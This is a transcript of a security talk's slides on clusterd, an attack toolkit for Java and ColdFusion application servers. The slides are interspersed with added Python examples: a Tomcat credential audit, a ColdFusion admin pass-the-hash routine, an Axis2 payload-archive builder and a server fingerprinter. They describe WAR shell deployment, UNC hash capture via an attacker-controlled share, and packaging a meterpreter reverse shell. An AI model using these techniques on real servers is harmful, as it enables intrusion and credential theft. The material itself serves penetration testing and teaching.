Published by Myrtle Reed. Modified over 9 years ago.
1
clusterd: app server security
Bryan Alexander
2
who
- pentester @ Coalfire Labs
- independent researcher
- breaking via building
3
why?
4
why?
- ColdFusion 10 deployments?
- JRun hash retrieval?
- WebLogic anythings?
- Running versions?
- JBoss 7.x/8.x deploys?
- Brute forcing?
- Railo? Axis2? WebSphere?!
- More!?
5
what
- clusterd: application server attack toolkit
- Python-based, command line driven
- Support for JBoss, WebLogic, Tomcat, ColdFusion, Railo, …
6
what
- JBoss
- Tomcat
- WebLogic
- ColdFusion
- Railo
- Axis2
7
JBoss
- So much has already been said (Matasano, Red Team Pentesting, HSC)
- Let's talk about things that haven't been
8
JBoss Recap
- Versions 3.x – 7.x are "JBoss AS"; 8.x+ rebranded to "WildFly"
- Make it rain shells with WARs
- No security by default
- clusterd currently features 7 unique deployers
- Typically runs as an administrative/SYSTEM user, so a deployed shell inherits that
9
JBoss Recap
10
JBoss 7.x
- One interface to rule them all: the HTTP management API (JSON, port 9990 by default)
- They still haven't figured out how authentication works
- Unauthenticated deploys via an exposed management interface
11
JBoss UNC
- Not a new attack, but a new application
- Force JBoss (on Windows) to load a remote resource via a UNC path, e.g. a deployment URL pointing at \\attacker\share
- The service account authenticates to the share; capture the NetNTLM hashes, crack 'em
12
JBoss CVE-2005-2006
- Nobody is using this bug to fetch credentials
13
JBoss Auxiliary
- Auxiliary modules used for scraping remote information
14
Tomcat Recap
- Tomcat 3.x – 8.x; very consistent platform
- Default creds!
- Roles! manager vs. manager-gui (Tomcat 7+ split the old manager role into manager-gui, manager-script, manager-jmx and manager-status; a WAR deploy needs manager-gui or manager-script)
- clusterd currently deploys to everything
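A small audit of the roles point above, as an added example (not clusterd code): it reads a tomcat-users.xml and flags accounts that carry default or trivial credentials or that hold a deploy-capable role. The XML and the credential list are constructed for the demo; the DEFAULT_CREDS set is illustrative, not exhaustive.

```python
"""Audit a tomcat-users.xml for default credentials and deploy-capable roles.
Added example (not clusterd code). The XML and credential list are constructed
for the demo. Tomcat 7+ puts users in the http://tomcat.apache.org/xml namespace,
older versions use no namespace, so tags are matched by local name."""
import xml.etree.ElementTree as ET

# Credential pairs that ship in docs/examples and that every scanner tries
# (constructed, illustrative list).
DEFAULT_CREDS = {
    ("tomcat", "tomcat"), ("admin", "admin"), ("admin", ""), ("tomcat", "s3cret"),
    ("manager", "manager"), ("role1", "tomcat"), ("both", "tomcat"),
}

# Any of these lets the holder push a WAR: the pre-7 "manager" role, the
# text/script interface (what tooling talks to), the HTML manager, and the
# JMX proxy.
DEPLOY_ROLES = {"manager", "manager-script", "manager-gui", "manager-jmx"}

SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="tomcat" roles="manager-gui,manager-script"/>
  <user username="deploy" password="Xk9vQ2pL8mZaT4" roles="manager-script"/>
  <user username="bob" password="bob" roles="tomcat"/>
</tomcat-users>
"""


def local_name(tag):
    """Strip an ElementTree namespace prefix: '{ns}user' -> 'user'."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return (username, issue, deploy_roles) tuples for risky accounts."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if local_name(el.tag) != "user":
            continue
        user = el.get("username", "")
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        deploy = sorted(roles & DEPLOY_ROLES)
        if (user, password) in DEFAULT_CREDS or user == password:
            findings.append((user, "default-or-username-as-password", deploy))
        elif deploy and len(password) < 12:
            findings.append((user, "short-password-on-deploy-capable-account", deploy))
        # Tomcat's manager docs say not to give one account both roles: the HTML
        # manager has CSRF protection, the text interface does not, and a shared
        # account lets a CSRF'd browser session reach both.
        if {"manager-gui", "manager-script"} <= roles:
            findings.append((user, "manager-gui-and-manager-script-on-one-account", deploy))
    return findings


if __name__ == "__main__":
    for user, issue, roles in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{user}: {issue} (deploy roles: {', '.join(roles) or 'none'})")
```

If the realm stores digested passwords the default-credential check needs the same digest applied to each candidate; the role checks are unaffected.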
15
Tomcat
- Not much going on; all the standard modules
16
WebLogic
- Oracle's very own JBoss/Tomcat (still Java)
- Very enterprise-y; clustering, systematic backups, etc.
- Difficult to obtain older versions (which have default creds)
17
WebLogic
- WebLogic supports deploying WAR files, and so does clusterd
- You have to use the java/jsp_shell_*_tcp payloads (default in clusterd)
18
WebLogic
- Admin interface over http and https (7001 plain by default, 7002 for the SSL listen port, 9002 when the domain-wide administration port is enabled)
- Typically run as a system service
- Clustered environment: a deploy to the admin server can trickle down to every managed server in the domain
- Very often seen in high-availability environments, i.e. systems running active/active
19
ColdFusion Recap
- ColdFusion 6.x – 11.x
- clusterd currently has three deployers for CF
- LFI leading to hash disclosure, v6.x – 10.x
- No cracking when you can PTH: the admin login form HMACs the stored SHA-1 hash with a per-request salt client-side, so the hash from password.properties is enough to log in
- No default credentials, but plenty of ways to get around that
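The pass-the-hash point above, as an added example (not clusterd code). It assumes the CF 8–10 admin login form's JavaScript submits hex_hmac_sha1(salt, hex_sha1(password).toUpperCase()), with salt taken from the hidden field on the login page, and that lib/password.properties stores that same upper-case SHA-1; the output case of the HMAC, the sample password and the salt are assumptions/constructed values.

```python
"""ColdFusion admin pass-the-hash. Added example, not clusterd code.
Assumption: the CF 8-10 admin login form submits
hex_hmac_sha1(salt, hex_sha1(password).toUpperCase()), where salt is the hidden
field on the login page, and password.properties stores the same upper-case
SHA-1. Sample password and salt below are constructed."""
import hashlib
import hmac


def stored_hash(password: str) -> str:
    """Value CF keeps in lib/password.properties: upper-case hex SHA-1."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def login_value(sha1_upper: str, salt: str) -> str:
    """What the login form posts as cfadminPassword: HMAC-SHA1 keyed with the
    salt over the hash string. Upper-casing the output is an assumption."""
    mac = hmac.new(salt.encode("utf-8"), sha1_upper.encode("utf-8"), hashlib.sha1)
    return mac.hexdigest().upper()


def login_from_password(password: str, salt: str) -> str:
    """Legitimate path: the browser hashes the typed password, then HMACs."""
    return login_value(stored_hash(password), salt)


def login_from_hash(leaked_sha1_upper: str, salt: str) -> str:
    """PTH path: only the hash from password.properties is known. The server
    compares HMAC(salt, stored_hash) and never sees the password, so this is
    indistinguishable from a real login; cracking the SHA-1 buys nothing."""
    return login_value(leaked_sha1_upper, salt)


if __name__ == "__main__":
    salt = "1407883000000"  # constructed; CF embeds a timestamp-like value
    leaked = stored_hash("Summer2014!")
    print("stored hash :", leaked)
    print("from pw     :", login_from_password("Summer2014!", salt))
    print("from hash   :", login_from_hash(leaked, salt))
```

The salt changes per page load, so the value has to be computed fresh for each login attempt from the salt the form actually served.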
20
ColdFusion
21
ColdFusion
- Everybody knows the task scheduler can be used to deploy (schedule a task that fetches a URL and saves the response to a file under the webroot)
- 10.x+ restricts the extension of the saved file (no .cfm/.cfml)
22
ColdFusion
- How about LFI to RCE?
23
Railo
- Railo 3.x – 4.x
- Essentially just a FOSS ColdFusion
- Task scheduler, plugin architecture, clustered servers, lots of development
- By default very promiscuous
24
Railo
- No public vulnerabilities, yet...
- Two admin interfaces: server.cfm (server-wide) and web.cfm (per web context)
- Runs JSP and CFML, much like CF
25
Axis2
- Axis2 1.2 – 1.6
- Web services (SOAP/WSDL) engine; you deploy services, not applications
- A couple of ways to deploy; clusterd currently supports one (recently added)
- Default creds! (admin / axis2)
- Last release was 2012, but still heavily used
26
Axis2
- Generating payloads is pretty simple, but we can't use vanilla msfpayload output
- Generate a java/meterpreter/reverse_tcp, pack it into a jar-style service archive (.aar), and build the services.xml descriptor that tells Axis2 which class to load
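Packaging a class into an Axis2 service archive, as an added example (not clusterd code). An .aar is a zip with META-INF/services.xml plus the compiled classes at their package path; the descriptor below uses the stock RPC message receivers, and CLASS_BYTES is a constructed placeholder standing in for output of javac.

```python
"""Build an Axis2 service archive (.aar). Added example, not clusterd code.
An .aar is a jar/zip: META-INF/services.xml plus the classes it names.
CLASS_BYTES is a constructed placeholder; real bytes come from javac."""
import io
import xml.etree.ElementTree as ET
import zipfile

SERVICES_XML = """<?xml version="1.0" encoding="UTF-8"?>
<serviceGroup>
  <service name="{service}" scope="application">
    <description>{service}</description>
    <messageReceivers>
      <messageReceiver mep="http://www.w3.org/2004/08/wsdl/in-only"
          class="org.apache.axis2.rpc.receivers.RPCInOnlyMessageReceiver"/>
      <messageReceiver mep="http://www.w3.org/2004/08/wsdl/in-out"
          class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/>
    </messageReceivers>
    <parameter name="ServiceClass">{klass}</parameter>
  </service>
</serviceGroup>
"""

# Placeholder only: the class-file magic followed by zeros, not a loadable class.
CLASS_BYTES = b"\xca\xfe\xba\xbe" + b"\x00" * 12


def build_aar(service_name: str, class_name: str, class_bytes: bytes) -> bytes:
    """Return the bytes of an .aar exposing class_name as service_name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("META-INF/services.xml",
                   SERVICES_XML.format(service=service_name, klass=class_name))
        # Axis2 loads the class through the archive's class loader, so it has
        # to sit at its package path (com.example.Foo -> com/example/Foo.class).
        z.writestr(class_name.replace(".", "/") + ".class", class_bytes)
    return buf.getvalue()


def describe_aar(aar_bytes: bytes):
    """Read an .aar back: (service name, ServiceClass, entry names)."""
    with zipfile.ZipFile(io.BytesIO(aar_bytes)) as z:
        entries = z.namelist()
        root = ET.fromstring(z.read("META-INF/services.xml"))
    service = root.find("service")
    klass = service.find("parameter[@name='ServiceClass']").text
    return service.get("name"), klass, entries


if __name__ == "__main__":
    aar = build_aar("Version", "com.example.Version", CLASS_BYTES)
    print(describe_aar(aar))
```

The archive is then dropped into WEB-INF/services on the server or uploaded through the admin console (the one that ships with admin / axis2). A payload class has to start itself when Axis2 instantiates it, for instance from a static initializer, since nothing calls a service method before the first SOAP request arrives.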
27
Axis2
- LFI in 1.4.x; obviously we're going to fetch creds (conf/axis2.xml holds the admin userName and password in clear text)
28
other features
- All platforms support brute forcing via a supplied wordlist
29
other features
- Clean up after yourselves; every platform has an undeployer
30
other features
- Discovery module
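What a discovery pass looks like, as an added example (this is not clusterd's discovery module): a handful of probe paths and header markers that are well-known defaults for each platform, run over responses. The responses here are constructed for the demo, not captured traffic.

```python
"""Fingerprint app servers from probe responses. Added example, not clusterd's
discovery module. Paths and markers are well-known defaults; the responses
below are constructed for the demo."""
from collections import namedtuple

Resp = namedtuple("Resp", "path status headers body")

# Probe path -> (platform, statuses that count as a hit). 401 on the Tomcat
# manager or the JBoss jmx-console still tells you the console is there.
PATH_PROBES = {
    "/manager/html": ("tomcat", {401}),
    "/jmx-console/": ("jboss", {200, 401}),
    "/CFIDE/administrator/index.cfm": ("coldfusion", {200}),
    "/railo-context/admin/server.cfm": ("railo", {200}),
    "/axis2/services/listServices": ("axis2", {200}),
}


def fingerprint(responses):
    """Map platform -> sorted list of evidence strings."""
    found = {}
    for r in responses:
        hdr = {k.lower(): v for k, v in r.headers.items()}
        server = hdr.get("server", "")
        powered = hdr.get("x-powered-by", "")
        # Tomcat's HTTP connector announces itself; JBoss embeds JBossWeb
        # (a Tomcat fork), so this header alone does not rule JBoss out.
        if "apache-coyote" in server.lower():
            found.setdefault("tomcat", set()).add("Server: " + server)
        if "jboss" in powered.lower():
            found.setdefault("jboss", set()).add("X-Powered-By: " + powered)
        # WebLogic's default error page quotes RFC 2068 in its body.
        if "weblogic" in server.lower() or "From RFC 2068" in r.body:
            found.setdefault("weblogic", set()).add("WebLogic error page or Server header")
        probe = PATH_PROBES.get(r.path)
        if probe and r.status in probe[1]:
            found.setdefault(probe[0], set()).add(f"{r.path} -> {r.status}")
    return {k: sorted(v) for k, v in found.items()}


# Constructed responses: a JBoss 5 box (JBossWeb answers with the Coyote
# header too) and a WebLogic box that 404s everything with its stock page.
JBOSS_HOST = [
    Resp("/", 200, {"Server": "Apache-Coyote/1.1",
                    "X-Powered-By": "Servlet 2.5; JBoss-5.0/JBossWeb-2.1"}, "<html>Welcome</html>"),
    Resp("/jmx-console/", 200, {"Server": "Apache-Coyote/1.1"}, "JMX Agent View"),
    Resp("/manager/html", 404, {"Server": "Apache-Coyote/1.1"}, ""),
    Resp("/CFIDE/administrator/index.cfm", 404, {}, ""),
]
WEBLOGIC_HOST = [
    Resp("/manager/html", 404, {},
         "Error 404--Not Found\nFrom RFC 2068 Hypertext Transfer Protocol -- HTTP/1.1:"),
]

if __name__ == "__main__":
    print(fingerprint(JBOSS_HOST))
    print(fingerprint(WEBLOGIC_HOST))
```

When both "tomcat" and "jboss" come back for one host, the path evidence decides: a 200/401 on /jmx-console/ with no /manager/html means JBoss, and the Tomcat deployers are the wrong tool.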
31
other features
- Maybe demo?
32
FOSSy
- Well-formed pull requests welcome: https://github.com/hatRiot/clusterd
- Public to-do hosted on Trello: https://trello.com/b/Bwcmrsyd/clusterd
- Research, 0days and fun stuff on my blog: http://hatriot.github.io/
- Tweet or email me your questions/bugs/requests: @dronesec (bryan.alexander@coalfire.com)
33
Questions? Comments?